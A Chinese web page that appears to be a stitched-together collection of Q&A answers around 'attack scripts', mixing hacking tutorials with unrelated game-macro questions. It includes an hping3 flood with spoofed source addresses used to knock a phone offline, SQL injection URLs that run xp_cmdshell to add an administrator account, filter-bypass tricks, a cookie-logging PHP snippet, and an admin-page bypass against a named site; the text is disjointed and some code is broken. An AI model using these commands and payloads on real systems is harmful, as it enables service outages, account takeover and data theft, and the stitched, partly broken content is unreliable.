慢速攻擊腳本

㈠ kail 如何編寫dos攻擊腳本

在計算機行業，拒絕服務(DoS)或分布式拒絕服務(DDoS)攻擊是指不法分子企圖讓某機器或網路資源無法被預期的用戶所使用。雖然執行DoS攻擊的方式、動機和目標不一樣，但通常包括設法臨時性或無限期中斷或暫停連接至互聯網的主機提供服務。

攻擊過程：

1.你使用hping3執行拒絕服務攻擊(即DoS)。

2.你隱藏你的a$$(我是指你的源頭IP地址)。

3.你的目標機器看到的將是隨機性源頭IP地址中的源頭，而不是你的IP地址(IP偽裝)。

4.你的目標機器會在5分鍾裡面不堪重負，停止響應。

ok，我們進行簡單的模擬攻擊：

先用nmap掃描內網存活主機

我們的攻擊目標是智能手機。

輸入命令hping -S--flood-V IP 開始攻擊

我們來看看攻擊的效果

ok 這時候手機已經呈現斷網狀態

按下ctrl+c關閉，這時候我們看看發送了多少數據

這個數據包很客觀的了。

另外就是隱藏IP攻擊目標

命令是這樣的：

hping3-S-U--flood-V--rand-sourceIP

㈡ 傳奇 S F 武器升級攻擊速度腳本 出問題了

武器mac2數值是1-10的時候攻速為負，比如數值為6的時候攻速就是-6。下面意思是當小於11的時候直接加11，大於？的時候不能升級，其他情況元寶夠就升級一點攻速。這段腳本有個問題，比如-1攻速武器升級一次就變成+2，-2攻速武器升級一次就變成+3。下面腳本能看懂的話也很容易解決。
#If
CheckItemAddValue 1 6 < 11
#ACT
UPGRADEITEMEX 1 6 0 1 0

UPGRADEITEMEX 1 6 0 1 0
UPGRADEITEMEX 1 6 0 1 0
UPGRADEITEMEX 1 6 0 1 0
UPGRADEITEMEX 1 6 0 1 0
UPGRADEITEMEX 1 6 0 1 0
UPGRADEITEMEX 1 6 0 1 0
UPGRADEITEMEX 1 6 0 1 0
UPGRADEITEMEX 1 6 0 1 0
UPGRADEITEMEX 1 6 0 1 0
UPGRADEITEMEX 1 6 0 1 0
#ELSEACT
goto @1
break
[@1]

#If
CheckItemAddValue 1 6 >3
#ACT
messagebox 已升3點。
#ELSEACT
goto @2
break
[@2]

#If
CHECKGAMEGOLD >
#ACT
UPGRADEITEMEX 1 6 0 1 0
#ELSEACT
messagebox 沒有穿武器或元寶不夠。
#ELSEACT
break

㈢ 什麼是腳本攻擊

最近腳本攻擊好象是很流行的，不過早在很久前就有這個了！腳本攻擊嚴格的說應該是一件藝術而不是漏洞！首先我們先要知道什麼是腳本，腳本就是運行在網頁伺服器上的文本程序，例如：ASP、PHP、CGI、JSP、ISAP等等，腳本的攻擊就是利用這些文件的設置和編寫時的錯誤或者疏忽不當，攻擊者就可以利用這些來達到自己攻擊目的，如果一個伺服器存在這些漏洞，那麼它的淪陷也是時間的問題！
這些文本文件一般都是要結合資料庫來使用的，這些資料庫有ACCESS、MSsql、MYSQL、Oracle等！腳本攻擊就是針對這些資料庫來配合腳本對一些變數的過濾不嚴的問題來達到得到用戶密碼等敏感信息，修改資料庫等目的！下面我就針對這些來分別舉例說明！
一、跨站腳本的攻擊
腳本的跨站（CSS/XSS）就是利用程序對用戶提交的變數不嚴，大多數是利用多媒體標簽，前段時間比較流行的flash跨站就是利用的這個，比如我在[FLASH=450,350][/FLASH]之間插入一個我自己作好的一個swf文件，swf文件里我們用geturl里加上javascript:window.open('http://qfaq.yeah.net'就可以讓他打開清風安全網的網站，如果這里是一個木馬網頁，呵呵，，，你就等著中木馬吧！還有就是竊取用戶的cookie，例如我們利用也就是圖片的跨站，在這個裡面插入
這段地址即可得到！如果將javascript過濾掉後怎麼辦？
好，我們在看看下面這段代碼：
[upload=swf]uploadImages/200310812145390577.swf?">[/upload]
怎麼樣，還是能將你的信息得到的，而且還不會彈出對話框！
另外在joekoe論壇程序里還有一個這樣的問題，比如你發個帖子里有[DIR][/DIR]就會彈出一個播放器的安裝程序，呵呵，如果是一個黑心的站長利用這個來放馬，那後果就不用說了吧！
解決辦法：現在還沒有好的方法解決這個問題，你要做的就是將多媒體的標簽刪掉！
另附ASP和PHP的跨站代碼
php如下
$info = getenv("QUERY_STRING";
if ($info) {
$fp = fopen("test.txt","a";
fwrite($fp,$info."n";
fclose($fp);
}
?>

asp如下

二、sql injection
是現在最熱門的，也是本文要重點說的！
1、ASP+ACCESS資料庫類型的SQL注射
現在的大多數網站是採用的這個組合，但是如果在ASP程序中沒有對用戶提交的變數充分過濾的話就可能導致管理員密碼被猜到，整個網站的信息就會暴漏無移~！
在大多數ASP站點中，我們並不知道其程序代碼，靠任何掃描器也不可能發現SQL injection漏洞，這時就要靠手工檢測了，由於我們執行SQL語句要用到單引號、分號、逗號、冒號和「--」，所以我們就在可修改的URL後加上以上符號，或在表單中的文本框加上這些符號！比如比較經典的金梅系統漏洞，在movie.aps中有怎麼一段代碼：
articleid=request("id"
set rs=server.createobject("adodb.recordset"
sql="update learning set hits=hits+1 where articleID="&articleid

--------------------------------------------------------------------------------

2 [轉帖]腳本安全和利用
rs.open sql,conn,1,3
sql="select * from learning where articleid="&articleid
rs.open sql,conn,1,1

articleid未經任何檢查便提交了，所以我們就可以自己構造一些SQL語句來提交上去！具體的利用過程請看拙作《SQL注入完整篇》和《SQL注入的補充》的動畫教程，這里我就不在重復的說了！
2、ASP+MYSQL資料庫類型的利用
MYSQL資料庫簡單使用和強大的功能一直以來都是網管們的最愛！但是如果是ASP中沒有對變數過濾的話，我們就可以來直接的到他的系統管理員許可權！
比如動網論壇、BBSXP論壇的SQL版有好幾個文件都沒有對ID過濾，所以我們只要找到他的存在問題的頁面就可以了，
看這段代碼：rs.open "select * from news where newsid=" & cstr(request("newsid"),conn,1,1
比如我們提交：
http://XXX/show.asp?id=1;exec master.dbo.xp_cmdshell 'net user xuehan ilovexuehan /add';--
http://XXX/show.asp?id=1;exec master.dbo.xp_cmdshell 'net localgroup administrators xuehan /add';--
看到了嗎？我們已經在系統中田加了一個xuehan 密碼是ilovexuehan的管理員帳號，以下的事情你就自己來做吧，呵呵，，，不用我來教了吧！！！
如果過濾了分號和單引號怎麼辦？呵呵，我們只要將我們的命令形式轉換一下，比如我們轉換成十六進制或者別的形式就可以繼續注入了，還有就是他如果過濾了xp_cmdshell 我們也可以解決，我們可以寫成xp'+'_cmd'+'shell形式，如果他將xp_cmdshell 擴展刪掉，我們可以通過xplog70.dll文件來恢復，呵呵，，，具體自己查找下資料庫的知識，當然我們也可以用別的擴展！所以說SQL injection不僅僅是一門技術，更要有靈活的頭腦和扎實的資料庫知識，特別是對SQL語言的掌握程度，如果不會SQL語言，你永遠都是生搬硬套，遇到障礙就過不去了！
3、PHP+MYSQL資料庫類型
PHP+MYSQL一直以來都認為是最安全的組合，不過一些文件沒有過濾單引號、反斜線等，我們也可以來進行注入，不過在最新的php安裝程序里的php.ini文件默認都是對這些過濾掉的，所以很大情況下我們是無法對進行注入的，不過也有許多牛人們可以饒過這個限制的！由於我的PHP和MYSQL不是太懂，所以就不能來具體舉例來說明了，大家要是有興趣可以去找寫資料來看！！！
需要從根本上解決解決SQL Injection問題。還得從程序本身入手。過濾不能單純的過濾URL所提交的參數，在表單里的也要過濾，value=後面的可以修改的數據，修改後可以提交到伺服器，總之對所有的表單提交的數據以及用戶可能對HTML源文件進行修改來控制的所有來自Web伺服器外部的數據進行過濾或轉換，對單引號、雙引號、分號「--」還有對數字鍵上面的所有特殊字元進行過濾，還有QUERY_STRING環境變數。在伺服器上刪除一些危險的擴展存儲過程，比如xp_cmdshell。有條件裝個IDS更好，不敢說無堅不摧，但至少可以阻擋大部分攻擊者。
三、一些別的腳本攻擊
有些程序沒有對cookie或者session進行過濾和檢查，就造成了用戶可以非法修改提交頁面，自己提交修改數據，比如像海陽頂端網木馬的以前版本對session沒有過濾，我們就可以饒過密碼的驗證來到達真正的頁面，還有就是post提交的問題，像leadbbs的2.77版本就是沒有充分的過濾，我們就可以把管理員的密碼修改成自己的密碼！
還有一個腳本的攻擊例子，在Discuz! 2.0 論壇里，因為個人屬性缺乏必要的安全確認，所以很容易誘使其他會員自動修改其個人屬性內容，特別是注冊郵件信息，這關系著登陸密碼的修改。
比如我們發個帖子，寫上

誘使會員點擊這個頁面後，就會自動修改該會員注冊的email地址為crack.x.h2163.com。當然為了隱蔽性，可以更新後自動關閉，然後調用另外一個假地址。
當然我們也可以利用這個漏洞進行欺騙、隱藏來誘惑管理員來修改我們為管理員等等！大家自己去學習吧！
看了這么多枯燥的東西下面我們再來看看另外一個好玩的漏洞，在百渡里搜索」傳奇留言薄「找幾個免費的留言本進去，找到他的登陸頁面，我找到的一個是：
http://www.conanshome.com/guestbook/login.asp
我們再來看看下面這個連接：
http://www.conanshome.com/guestbook/admin.asp?adminid=admin
哈，怎麼我們就闖入後台了！！！
什麼原因，自己去琢磨吧！
後記：腳本的攻擊可以說是防不勝防的，我們所要做的只能是提高編寫程序的嚴謹態度，人為的因素在腳本攻擊中是最重要的！
聲明：本文提到的漏洞都有一定的攻擊性，我們的目的是探討技術，搞破壞的是小人！所造成的一切後果於作者無關！由於作者水平有限，文中難免有錯誤之處，歡迎指出！

㈣ 網路安全技術 常見的DDoS攻擊方法有哪些

DDOS攻擊是分布式拒絕服務攻擊的簡稱，指處於不同位置的多個攻擊者同時向一個或者數個目標發動攻擊，或者一個攻擊者控制了位於不同位置的多台機器並利用這些機器對受害者同時實施攻擊。由於攻擊的發出點是分布在不同地方的，這類攻擊稱為分布式拒絕服務攻擊，其中的攻擊者可以有多個。

常見DDoS攻擊方法如下：

1、SYN Flood攻擊

是當前網路上最為常見的DDOS攻擊，它利用了TCP協議實現上的一個缺陷。通過向網路服務所在埠發送大量的偽造源地址的攻擊報文，就可能造成目標伺服器中的半開連接隊列被占滿，從而阻止其他合法用戶進行訪問。

2、UDP Flood攻擊

屬於日漸猖獗的流量型DDOS攻擊，原理也很簡單。常見的情況是利用大量UDP小包沖擊DNS伺服器或者Radius認證伺服器、流媒體視頻伺服器。由於UDP協議是一種無連接的服務，在UDP
Flood攻擊中，攻擊者可發送大量偽造源IP地址的小UDP包。

3、ICMP Flood攻擊

屬於流量型的攻擊方式，是利用大的流量給伺服器帶來較大的負載，影響伺服器的正常服務。由於目前很多防火牆直接過濾ICMP報文。因此ICMP
Flood出現的頻度較低。

4、Connection Flood攻擊

是典型的利用小流量沖擊大帶寬網路服務的攻擊方式，這種攻擊的原理是利用真實的IP地址向伺服器發起大量的連接。並且建立連接之後很長時間不釋放，佔用伺服器的資源，造成伺服器上殘余連接過多，效率降低，甚至資源耗盡，無法響應其他客戶所發起的鏈接。

5、HTTP Get攻擊

主要是針對存在ASP、JSP、PHP、CGI等腳本程序，特徵是和伺服器建立正常的TCP連接，並不斷地向腳本程序提交查詢、列表等大量耗費資料庫資源的調用。它可以繞過普通的防火牆防護，通過Proxy代理實施攻擊，缺點是攻擊靜態頁面的網站效果不佳，會暴露攻擊者的lP地址。

6、UDP DNS Query Flood攻擊

採用的方法是向被攻擊的伺服器發送大量的域名解析請求，通常請求解析的域名是隨機生成或者是網路世界上根本不存在的域名。域名解析的過程給伺服器帶來了很大的負載，每秒鍾域名解析請求超過一定的數量就會造成DNS伺服器解析域名超時。

㈤ 奇跡MU敏捷、攻擊速度跟腳本延遲時間的關系是怎麼樣的拜託了各位 謝謝

連擊腳本與攻擊速度有關。當然，敏越高，速度越快。 延時，如果腳本效果PL過多，你就把PL延時縮小，或，把XF放大，或，二都同時進行， 如果，XF過多，就就把XF縮小。 如果你想要做一個比較好的本，每次縮小或放大的延時為6毫秒， 當然，你也可以一次放大縮小幾十毫秒，這樣，腳本就比較粗糙了

㈥ cc攻擊和ddos攻擊有什麼區別啊

CC攻擊和DDoS攻擊的區別表現在：攻擊對象、危害、門檻、流量大小等方面。

1、攻擊對象不同

DDoS是針對IP的攻擊。

CC攻擊針對的是網頁。

2、危害不同

DDoS攻擊危害性較大，更難防禦。

CC攻擊的危害不是毀滅性的，但是持續時間長。

3、門檻不同

DDoS攻擊門檻高，攻擊者一般需要在攻擊前搜集被攻擊目標主機數目、地址情況、目標主機的配置性能等資料，盲目攻擊可能導致效果不佳。

CC攻擊門檻低，利用更換IP代理工具即可實施攻擊，且目標比較明確，黑客水平比較低的用戶也能進行。

4、流量大小不同

DDoS攻擊比CC攻擊所需要流量更大。

CC攻擊有時不需要很大的流量。

㈦ 網路安全攻擊方法分為

1、跨站腳本-XSS
相關研究表明，跨站腳本攻擊大約占據了所有攻擊的40%，是最為常見的一類網路攻擊。但盡管最為常見，大部分跨站腳本攻擊卻不是特別高端，多為業余網路罪犯使用別人編寫的腳本發起的。
跨站腳本針對的是網站的用戶，而不是Web應用本身。惡意黑客在有漏洞的網站里注入一段代碼，然後網站訪客執行這段代碼。此類代碼可以入侵用戶賬戶，激活木馬程序，或者修改網站內容，誘騙用戶給出私人信息。
防禦方法：設置Web應用防火牆可以保護網站不受跨站腳本攻擊危害。WAF就像個過濾器，能夠識別並阻止對網站的惡意請求。購買網站託管服務的時候，Web託管公司通常已經為你的網站部署了WAF，但你自己仍然可以再設一個。
2、注入攻擊
開放Web應用安全項目新出爐的十大應用安全風險研究中，注入漏洞被列為網站最高風險因素。SQL注入方法是網路罪犯最常見的注入方法。
注入攻擊方法直接針對網站和伺服器的資料庫。執行時，攻擊者注入一段能夠揭示隱藏數據和用戶輸入的代碼，獲得數據修改許可權，全面俘獲應用。
防禦方法：保護網站不受注入攻擊危害，主要落實到代碼庫構建上。比如說：緩解SQL注入風險的首選方法就是始終盡量採用參數化語句。更進一步，可以考慮使用第三方身份驗證工作流來外包你的資料庫防護。
3、模糊測試
開發人員使用模糊測試來查找軟體、操作系統或網路中的編程錯誤和安全漏洞。然而，攻擊者可以使用同樣的技術來尋找你網站或伺服器上的漏洞。
採用模糊測試方法，攻擊者首先向應用輸入大量隨機數據讓應用崩潰。下一步就是用模糊測試工具發現應用的弱點，如果目標應用中存在漏洞，攻擊者即可展開進一步漏洞利用。
防禦方法：對抗模糊攻擊的最佳方法就是保持更新安全設置和其他應用，尤其是在安全補丁發布後不更新就會遭遇惡意黑客利用漏洞的情況下。
4、零日攻擊
零日攻擊是模糊攻擊的擴展，但不要求識別漏洞本身。此類攻擊最近的案例是谷歌發現的，在Windows和chrome軟體中發現了潛在的零日攻擊。
在兩種情況下，惡意黑客能夠從零日攻擊中獲利。第一種情況是：如果能夠獲得關於即將到來的安全更新的信息，攻擊者就可以在更新上線前分析出漏洞的位置。第二種情況是：網路罪犯獲取補丁信息，然後攻擊尚未更新系統的用戶。這兩種情況，系統安全都會遭到破壞，至於後續影響程度，就取決於黑客的技術了。
防禦方法：保護自己和自身網站不受零日攻擊影響最簡便的方法，就是在新版本發布後及時更新你的軟體。
5、路徑(目錄)遍歷
路徑遍歷攻擊針對Web
root文件夾，訪問目標文件夾外部的未授權文件或目錄。攻擊者試圖將移動模式注入伺服器目錄，以便向上爬升。成功的路徑遍歷攻擊能夠獲得網站訪問權，染指配置文件、資料庫和同一實體伺服器上的其他網站和文件。
防禦方法：網站能否抵禦路徑遍歷攻擊取決於你的輸入凈化程度。這意味著保證用戶輸入安全，並且不能從你的伺服器恢復出用戶輸入內容。最直觀的建議就是打造你的代碼庫，這樣用戶的任何信息都不會傳輸到文件系統API。即使這條路走不通，也有其他技術解決方案可用。
6、分布式拒絕服務-DDOS
DDoS攻擊本身不能使惡意黑客突破安全措施，但會令網站暫時或永久掉線。相關數據顯示：單次DDOS攻擊可令小企業平均損失12.3萬美元，大型企業的損失水平在230萬美元左右。
DDoS旨在用請求洪水壓垮目標Web伺服器，讓其他訪客無法訪問網站。僵屍網路通常能夠利用之前感染的計算機從全球各地協同發送大量請求。而且，DDoS攻擊常與其他攻擊方法搭配使用;攻擊者利用DDOS攻擊吸引安全系統火力，從而暗中利用漏洞入侵系統。
防禦方法：保護網站免遭DDOS攻擊侵害一般要從幾個方面著手：首先，需通過內容分發網路、負載均衡器和可擴展資源緩解高峰流量。其次，需部署Web應用防火牆，防止DDOS攻擊隱蔽注入攻擊或跨站腳本等其他網路攻擊方法。
7、中間人攻擊
中間人攻擊常見於用戶與伺服器間傳輸數據不加密的網站。作為用戶，只要看看網站的URL是不是以https開頭就能發現這一潛在風險了，因為HTTPS中的s指的就是數據是加密的，缺了S就是未加密。
攻擊者利用中間人類型的攻擊收集信息，通常是敏感信息。數據在雙方之間傳輸時可能遭到惡意黑客攔截，如果數據未加密，攻擊者就能輕易讀取個人信息、登錄信息或其他敏感信息。
防禦方法：在網站上安裝安全套接字層就能緩解中間人攻擊風險。SSL證書加密各方間傳輸的信息，攻擊者即使攔截到了也無法輕易破解。現代託管提供商通常已經在託管服務包中配置了SSL證書。
8、暴力破解攻擊
暴力破解攻擊是獲取Web應用登錄信息相當直接的一種方式。但同時也是非常容易緩解的攻擊方式之一，尤其是從用戶側加以緩解最為方便。
暴力破解攻擊中，攻擊者試圖猜解用戶名和密碼對，以便登錄用戶賬戶。當然，即使採用多台計算機，除非密碼相當簡單且明顯，否則破解過程可能需耗費幾年時間。
防禦方法：保護登錄信息的最佳辦法，是創建強密碼，或者使用雙因子身份驗證。作為網站擁有者，你可以要求用戶同時設置強密碼和2FA，以便緩解網路罪犯猜出密碼的風險。
9、使用未知代碼或第三方代碼
盡管不是對網站的直接攻擊，使用由第三方創建的未經驗證代碼，也可能導致嚴重的安全漏洞。
代碼或應用的原始創建者可能會在代碼中隱藏惡意字元串，或者無意中留下後門。一旦將受感染的代碼引入網站，那就會面臨惡意字元串執行或後門遭利用的風險。其後果可以從單純的數據傳輸直到網站管理許可權陷落。
防禦方法：想要避免圍繞潛在數據泄露的風險，讓你的開發人員分析並審計代碼的有效性。
10、網路釣魚
網路釣魚是另一種沒有直接針對網站的攻擊方法，但我們不能將它除在名單之外，因為網路釣魚也會破壞你系統的完整性。
網路釣魚攻擊用到的標准工具就是電子郵件。攻擊者通常會偽裝成其他人，誘騙受害者給出敏感信息或者執行銀行轉賬。此類攻擊可以是古怪的419騙局，或者涉及假冒電子郵件地址、貌似真實的網站和極具說服力用語的高端攻擊。
防禦方法：緩解網路釣魚騙局風險最有效的方法，是培訓員工和自身，增強對此類欺詐的辨識能力。保持警惕，總是檢查發送者電子郵件地址是否合法，郵件內容是否古怪，請求是否不合常理。

㈧ 求一個盛大傳奇3,能自動攻擊的腳本.按鍵精靈9 用的,就只需要實現連續按F1,每隔半秒,連續攻擊就行了

Do
KeyPress "F1", 1
Delay 500
Loop

有的游戲會屏蔽按鍵的吧 如果是這樣的話 你先開按鍵 再開游戲
還有個問題 你說的按了沒反應是什麼意思 是腳本沒運行還是運行著沒反應 還是運行了立即停止

看這段「你說的按了沒反應是什麼意思 是腳本沒運行還是運行著沒反應 還是運行了立即停止

」